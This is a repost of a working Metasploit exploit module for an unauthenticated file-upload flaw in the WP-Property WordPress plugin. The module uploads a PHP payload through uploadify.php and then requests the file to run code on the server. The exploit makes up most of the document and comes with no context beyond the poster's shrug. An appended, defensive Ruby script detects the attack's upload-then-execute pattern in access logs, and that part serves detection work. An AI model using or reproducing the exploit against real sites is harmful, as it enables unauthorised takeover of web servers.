WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987' ],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self => true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this is or how to use it. I mean msf.
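An added detection example from the defender's side, not part of the original post or of the Metasploit module: it scans constructed Apache-style access log lines for the two requests the module above makes, a POST to uploadify.php followed by a GET of a freshly dropped .php file in the same uploadify directory, and correlates them by client IP. The log format, sample addresses and the dropped file name are assumptions.

```ruby
require 'set'

# Path of the unauthenticated upload handler abused by the module above.
UPLOADIFY_RE = %r{/wp-content/plugins/wp-property/third-party/uploadify/(?<file>[^\s?]*)}

# Combined log format: ip - - [time] "METHOD path HTTP/x" status size "ref" "ua"
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

# Constructed sample lines (not real traffic): a benign plugin asset load,
# an upload POST to uploadify.php, then a GET of a newly dropped .php file.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"
  198.51.100.23 - - [04/Jan/2013:19:51:30 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 112 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
  198.51.100.23 - - [04/Jan/2013:19:51:31 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/xkqpz.php HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
LOG

# Returns a list of alert hashes. Any POST to uploadify.php is recorded; a GET of
# another .php in that directory is :unexpected_php, or :upload_then_execute when
# the same client POSTed earlier (the exact sequence the module performs).
def detect_uploadify_abuse(log_text)
  uploaders = Set.new
  alerts = []
  log_text.each_line do |line|
    m = LOG_RE.match(line) or next
    u = UPLOADIFY_RE.match(m[:path]) or next
    file = u[:file]
    if m[:method] == 'POST' && file == 'uploadify.php'
      uploaders << m[:ip]
      alerts << { ip: m[:ip], kind: :upload_attempt, path: m[:path], status: m[:status].to_i }
    elsif m[:method] == 'GET' && file.end_with?('.php') && file != 'uploadify.php'
      kind = uploaders.include?(m[:ip]) ? :upload_then_execute : :unexpected_php
      alerts << { ip: m[:ip], kind: kind, path: m[:path], status: m[:status].to_i }
    end
  end
  alerts
end

if __FILE__ == $0
  detect_uploadify_abuse(SAMPLE_LOG).each do |a|
    puts "#{a[:kind]} #{a[:ip]} #{a[:path]} (#{a[:status]})"
  end
end
```

A 200 on the POST together with a 200 on the follow-up GET is the strongest signal; a 404 on the GET still indicates an attempt worth triaging.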